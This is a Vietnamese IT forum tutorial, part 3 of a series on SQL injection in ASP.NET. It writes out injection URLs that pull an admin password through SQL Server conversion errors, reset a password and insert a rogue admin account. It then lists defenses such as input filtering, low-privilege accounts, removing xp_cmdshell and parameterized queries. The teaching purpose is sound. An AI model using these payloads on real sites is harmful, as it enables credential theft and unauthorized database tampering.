(¯`'•.¸(¯`'•.¸† Sinh Viên IT†¸.•'´¯)¸.•'

(`'•.¸(`'•.¸¤*¤¸.-'´)¸.•'´) «´¨`•..¤ WELCOME :¤..•´¨`» (¸.•'´(¸.•'´¤*¤`'•.¸)`'•.¸)
 
IndexPortalCalendarTrợ giúpTìm kiếmThành viênNhómĐăng kýĐăng Nhập

Share | 
 

 Tấn công kiểu SQL Injection và các phòng chống trong ASP.NET(phần 3)

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down 
Tác giảThông điệp
Admin
Admin
avatar

Posts : 84
Points : 249
Thanks : 0
Join date : 21/03/2012
Age : 24
Đến từ : Lâm Đồng

Bài gửiTiêu đề: Tấn công kiểu SQL Injection và các phòng chống trong ASP.NET(phần 3)   Fri Mar 23, 2012 1:52 am

Tấn công kiểu SQL Injection và các phòng chống trong ASP.NET(phần 3)

Tấn công kiểu SQL Injection và các phòng chống trong ASP.NET(phần 1)
Tấn công kiểu SQL Injection và các phòng chống trong ASP.NET(phần 2)



10. Nhận các numeric string
Có một hạn chế nhỏ đối với phương pháp trên. Chúng ta không thể nhận được các error message nếu server có thể chuyển text đúng ở dạng số (text chỉ chứa các kí tự số từ 0 đến 9). Giả sử như password của "trinity" là "31173". Vậy nếu ta thi hành lệnh sau:
http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
Thì khi đó chỉ nhận được thông báo lỗi "Page Not Found". Lý do bởi vì server có thể chuyển passoword "31173" sang dạng số trước khi UNION với integer 10. Để giải quyết vấn đề này, chúng ta có thể thêm một vài kí tự alphabet vào numeric string này để làm thất bại sự chuyển đổi từ text sang số của server. Dòng query mới như sau:
http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
Chúng ta dùng dấu cộng (+) để nối thêm text vào password (ASCII code của '+' là 0x2b). Chúng ta thêm chuỗi '(space)morpheus' vào cuối password để tạo ra một string mới không phải numeric string là '31173 morpheus'. Khi hàm convert() được gọi để chuyển '31173 morpheus' sang integer, SQL server sẽ phát lỗi ODBC error message sau:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.

/index.asp, line 5
Và nghĩa là bây giờ ta cũng có thể login vào với username 'trinity' và password là '31173'

11. Thay đổi dữ liệu (Update/Insert) của CSDL

Khi đã có tên của tất cả các column trong table, có thể sử dụng statement UPDATE hoặc INSERT để sửa đổi/tạo mới một record vào table này.

Để thay đổi password của "neo", có thể làm như sau:
http://yoursite.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
Hoặc nếu bạn muốn một record mới vào table:
http://yoursite.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
Và bây giờ có thể login vào với username "neo2" và password là "newpas5"

12. Ngăn chặn SQL Injection

Hãy loại bỏ các kí tự meta như '"/\; và các kí tự extend như NULL, CR, LF, ... trong các string nhận được từ:

* input do người dùng đệ trình
* các tham số từ URL
* các giá trị từ cookie

Đối với các giá trị numeric, hãy chuyển nó sang integer trước khi query SQL, hoặc dùng ISNUMERIC để chắc chắn nó là một số integer.

Thay đổi "Startup and run SQL Server" dùng mức low privilege user trong tab SQL Server Security.

Xóa các stored procedure trong database master mà không dùng như:

* xp_cmdshell
* xp_startmail
* xp_sendmail
* sp_makewebtask

13. Ngăn chặn SQL Injection trong ASP.NET

Các cách thức ngăn chặn SQL Injection được trình bày ở phần 12 đã bao quát đủ phương pháp, nhưng trong ASP.NET có cách ngăn chặn đơn giản là sử dụng các Parameters khi làm việc với object SqlCommand (hoặc OleDbCommand) chứ không sử dụng các câu lệnh SQL trực tiếp. Khi đó .NET sẽ tự động validate kiểu dữ liệu, nội dung dữ liệu trước khi thực hiện câu lệnh SQL.

Ngoài ra, cũng cần kiểm soát tốt các thông báo lỗi. Và mặc định trong ASP.NET là thông báo lỗi sẽ không được thông báo chi tiết khi không chạy trên localhost.
13. Tài liệu thao khảo

1. How I hacked PacketStorm (Rain Forest Puppy) http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
2. Great article on gathering information from ODBC error messages
http://www.blackhat.com/presentation...Litchfield.doc
3. A good summary of SQL Injection on various SQL Server onhttp://www.owasp.org/asac/input_validation/sql.shtml
4. Senseport's article on reading SQL Injection http://www.sensepost.com/misc/SQLinsertion.htm
5. Khác:
http://www.digitaloffense.net/warga.../IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6


Về Đầu Trang Go down
Xem lý lịch thành viên http://sinhviennet.forumvi.com
 
Tấn công kiểu SQL Injection và các phòng chống trong ASP.NET(phần 3)
Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» GTA IV (PC) DVDrip

Permissions in this forum:Bạn không có quyền trả lời bài viết
(¯`'•.¸(¯`'•.¸† Sinh Viên IT†¸.•'´¯)¸.•' :: QUY ĐỊNH CHUNG :: Thông Báo-
Chuyển đến